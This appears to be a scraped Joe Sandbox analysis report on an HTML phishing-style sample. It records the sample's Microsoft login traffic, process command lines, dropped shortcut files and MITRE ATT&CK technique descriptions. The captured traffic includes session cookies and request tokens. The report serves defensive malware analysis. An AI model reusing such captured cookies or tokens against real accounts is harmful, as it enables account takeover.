2025-03-06 21:55:45 UTC	1282	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 31 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 76 32 2e 30 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 26 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 69 63 72 6f Data Ascii: [{"age":0,"body":{"elapsed_time":2613,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.micro
2025-03-06 21:55:52 UTC	360	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Request-Context: appId=cid-v1:41ca65cb-08a6-4a29-94ab-18b081ee8b8b Date: Thu, 06 Mar 2025 21:55:52 GMT Content-Length: 53 Connection: close Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *
2025-03-06 21:55:52 UTC	53	IN	Data Raw: 4e 45 4c 20 41 67 67 72 65 67 61 74 6f 72 20 68 61 73 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 70 72 6f 63 65 73 73 65 64 20 74 68 65 20 72 65 71 75 65 73 74 Data Ascii: NEL Aggregator has successfully processed the request

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:56:06 UTC	3157	OUT	POST /common/GetCredentialType?mkt=en-US HTTP/1.1 Host: login.microsoftonline.com Connection: keep-alive Content-Length: 2042 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" hpgrequestid: d06ff2bb-8ce1-410b-8ec8-5b6a411d8c00 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 client-request-id: c78ca9f6-666c-4189-a6c8-50defdad580f canary: PAQABDgEAAABVrSpeuWamRam2jAF1XRQEJkoMD1qpJwDP-Q6z2T64EgIX2V0YPVMzhOTKAeXQKdZFZvoopHHztWWrGWDLZRekXP83GGZD3oDZ6M_0KeidovJdF47uJbuBQzsT3QHc5IDHi2-vwvkUaOIgOilt7t4D_eZZ1o46QsZYJMiHSYomaUjRoTG9cIC4xIDGX0vma3Vp0ejdMCURXL2GqjURFtDFjoitONp63TWJljS0DbjQtiAA Content-type: application/json; charset=UTF-8 hpgid: 1104 Accept: application/json hpgact: 1800 sec-ch-ua-platform: "Windows" Origin: https://login.microsoftonline.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638768949326945979.MGViZmE4OWItOTMyOC00ZTMxLWJjMTEtNDE4OTE3ZWNjYmYwYWJhNmI4OTUtYjM4Zi00ZTI1LTgxM2YtNzIyZDhhM2ZmNjk1&ui_locales=en-US&mkt=en-US&client-request-id=c78ca9f6-666c-4189-a6c8-50defdad580f&state=Rt8257lTmFhAL8-m-OCyBp-9HhiZIwQ_uaZ4DX79nrgtbKWNdr3UkmOm8jh5gVJko5153buwx_4McvBz3M1zriICy36Rzk1OqPwRco-6uhbAkOuEWIHF5Oh9FtB4MA3AmvfMMCPccmjUtTfMiyA-EDCUnL2nl1n2PLJxWXYOkVhf-kl6RI94t6rxZP-KKVKBhQi3kUrqU9IQ7aXpMHtZQa0E8yFxX0qlGVKTVVhJz5Yse_26TLBb8V1Aufv4Wo3JNarroRuYMtmtIj0zmX0S0jBksXmzGqujWjrOoTcam6f_bdG_zuBGvRJHPX2HvV82&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: esctx-o5hmElAb9b8=AQABCQEAAABVrSpeuWamRam2jAF1XRQEAZ5w3bUrYbMIuMck-Ecql_diaEKAntEg63fe2ysZVdaOT9XYaKgZrECugfczZ46IgN2sWnFgPFSPp8nMZY0H9Lm6GdnfPGBZyOo7bH0iMV1eAB2RhDxS-1zNVCtDEksXsBVRXC9PrTIeFIZdhGEEkiAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUsAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABLAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEJK9ZJqdhv9v_qmyvVAlsR1APNn6zj-1xI7rDNNDvZK11zGWQMz3xRpBkix8TbIA2FxowiFvY37jkeKmOVnhwWAVaic8AYW-YAdJF3stOftYgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEdbv8CXBhuQbLQf1VY8MqnNC-5UZYaZF1OlluX4YSlt5fpLPqlPZyTNOQ8sZICZKVEswwmXqutwe5Lasjy0N0_IfWDaTyI6ZUt7X6jcepT_6XgN4yGPRngY9BiMj6hoirDQRwvfaa4LEap0wDPHaRoIChDelQ7ZILRV3A-rIcz3kgAA; esctx-aKxRFnyWKM=AQABCQEAAABVrSpeuWamRam2jAF1XRQElBMnk3lhtaavH5x0_R3OCGibHy9JJybbIp0Jt0DaTjl8WS_mS0Xa0pNc3DD2sR-izExje7colbezsJt8Jc6czFKvPjV0eHjDJ9q_3QUJkyAOIA-9UgvzAtPOdpM1gussUpmZORLaqGtb65hxhwLSAyAA; fpc=ArNZiE-suGVClIK0j8HrpL68Ae7AAQAAANwQXN8OAAAA; MicrosoftApplicationsTelemetryDeviceId=90345 [TRUNCATED]
2025-03-06 21:56:06 UTC	2042	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 35 39 63 34 64 40 68 61 71 6c 68 74 76 2e 6e 65 74 22 2c 22 69 73 4f 74 68 65 72 49 64 70 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 68 65 63 6b 50 68 6f 6e 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 52 65 6d 6f 74 65 4e 47 43 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 69 73 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 53 68 6f 77 6e 22 3a 66 61 6c 73 65 2c 22 69 73 46 69 64 6f 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 6f 72 69 67 69 6e 61 6c 52 65 71 75 65 73 74 22 3a 22 72 51 51 49 41 52 41 41 6a 64 4b 39 69 79 4e 31 47 41 66 77 54 4c 4b 62 33 59 30 76 47 30 36 52 73 78 43 32 45 42 48 50 53 65 62 39 5a 65 47 4b 79 66 74 4d 4d 70 6c 73 64 6a 4b 54 6a 45 58 49 54 47 5a 32 33 6e 34 7a 79 62 7a 6c 35 Data Ascii: {"username":"b59c4d@haqlhtv.net","isOtherIdpSupported":true,"checkPhones":false,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":true,"originalRequest":"rQQIARAAjdK9iyN1GAfwTLKb3Y0vG06RsxC2EBHPSeb9ZeGKyftMMplsdjKTjEXITGZ23n4zybzl5
2025-03-06 21:56:07 UTC	1620	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" client-request-id: c78ca9f6-666c-4189-a6c8-50defdad580f x-ms-request-id: bed44615-761a-43a6-b52f-7f25fb137400 x-ms-ests-server: 2.1.20139.6 - FRC ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-DWPPklNns6dBpvySy7ZjDA' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All X-XSS-Protection: 0 Set-Cookie: fpc=ArNZiE-suGVClIK0j8HrpL68Ae7AAQAAANwQXN8OAAAA; expires=Sat, 05-Apr-2025 21:56:06 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Date: Thu, 06 Mar 2025 21:56:06 GMT Connection: close Content-Length: 1271
2025-03-06 21:56:07 UTC	1271	IN	Data Raw: 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 62 35 39 63 34 64 40 68 61 71 6c 68 74 76 2e 6e 65 74 22 2c 22 44 69 73 70 6c 61 79 22 3a 22 62 35 39 63 34 64 40 68 61 71 6c 68 74 76 2e 6e 65 74 22 2c 22 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 22 3a 31 2c 22 49 73 55 6e 6d 61 6e 61 67 65 64 22 3a 66 61 6c 73 65 2c 22 54 68 72 6f 74 74 6c 65 53 74 61 74 75 73 22 3a 31 2c 22 43 72 65 64 65 6e 74 69 61 6c 73 22 3a 7b 22 50 72 65 66 43 72 65 64 65 6e 74 69 61 6c 22 3a 31 2c 22 48 61 73 50 61 73 73 77 6f 72 64 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 65 4e 67 63 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 69 64 6f 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 51 72 43 6f 64 65 50 69 6e 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 53 61 73 50 61 72 61 6d 73 22 3a 6e 75 6c 6c Data Ascii: {"Username":"b59c4d@haqlhtv.net","Display":"b59c4d@haqlhtv.net","IfExistsResult":1,"IsUnmanaged":false,"ThrottleStatus":1,"Credentials":{"PrefCredential":1,"HasPassword":true,"RemoteNgcParams":null,"FidoParams":null,"QrCodePinParams":null,"SasParams":null

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VN_MSG-Splcenter.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Data Obfuscation

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Windows Analysis Report
VN_MSG-Splcenter.html

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:56:09 UTC	1598	OUT	GET /common/GetCredentialType?mkt=en-US HTTP/1.1 Host: login.microsoftonline.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: esctx-o5hmElAb9b8=AQABCQEAAABVrSpeuWamRam2jAF1XRQEAZ5w3bUrYbMIuMck-Ecql_diaEKAntEg63fe2ysZVdaOT9XYaKgZrECugfczZ46IgN2sWnFgPFSPp8nMZY0H9Lm6GdnfPGBZyOo7bH0iMV1eAB2RhDxS-1zNVCtDEksXsBVRXC9PrTIeFIZdhGEEkiAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUsAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABLAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEJK9ZJqdhv9v_qmyvVAlsR1APNn6zj-1xI7rDNNDvZK11zGWQMz3xRpBkix8TbIA2FxowiFvY37jkeKmOVnhwWAVaic8AYW-YAdJF3stOftYgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEdbv8CXBhuQbLQf1VY8MqnNC-5UZYaZF1OlluX4YSlt5fpLPqlPZyTNOQ8sZICZKVEswwmXqutwe5Lasjy0N0_IfWDaTyI6ZUt7X6jcepT_6XgN4yGPRngY9BiMj6hoirDQRwvfaa4LEap0wDPHaRoIChDelQ7ZILRV3A-rIcz3kgAA; esctx-aKxRFnyWKM=AQABCQEAAABVrSpeuWamRam2jAF1XRQElBMnk3lhtaavH5x0_R3OCGibHy9JJybbIp0Jt0DaTjl8WS_mS0Xa0pNc3DD2sR-izExje7colbezsJt8Jc6czFKvPjV0eHjDJ9q_3QUJkyAOIA-9UgvzAtPOdpM1gussUpmZORLaqGtb65hxhwLSAyAA; fpc=ArNZiE-suGVClIK0j8HrpL68Ae7AAQAAANwQXN8OAAAA; MicrosoftApplicationsTelemetryDeviceId=90345 [TRUNCATED]
2025-03-06 21:56:09 UTC	1562	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 05ac8a52-2bad-4033-a983-22f706997000 x-ms-ests-server: 2.1.20139.6 - SEC ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-Q-2WlB5rVYhp5fEwbR81UQ' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All X-XSS-Protection: 0 Set-Cookie: fpc=ArNZiE-suGVClIK0j8HrpL68Ae7AAQAAANwQXN8OAAAA; expires=Sat, 05-Apr-2025 21:56:09 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Date: Thu, 06 Mar 2025 21:56:09 GMT Connection: close Content-Length: 164
2025-03-06 21:56:09 UTC	164	IN	Data Raw: 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 65 33 66 64 63 33 62 35 2d 64 65 30 64 2d 34 63 65 66 2d 39 37 62 38 2d 61 35 32 66 35 66 31 31 39 30 61 66 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 33 2d 30 36 20 32 31 3a 35 36 3a 30 39 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d Data Ascii: {"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"e3fdc3b5-de0d-4cef-97b8-a52f5f1190af","timestamp":"2025-03-06 21:56:09Z","message":"AADSTS900561"}}

Target ID:	0
Start time:	16:54:41
Start date:	06/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\VN_MSG-Splcenter.html"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	16:54:44
Start date:	06/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1808,i,11259939313159330260,10342011823358960572,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre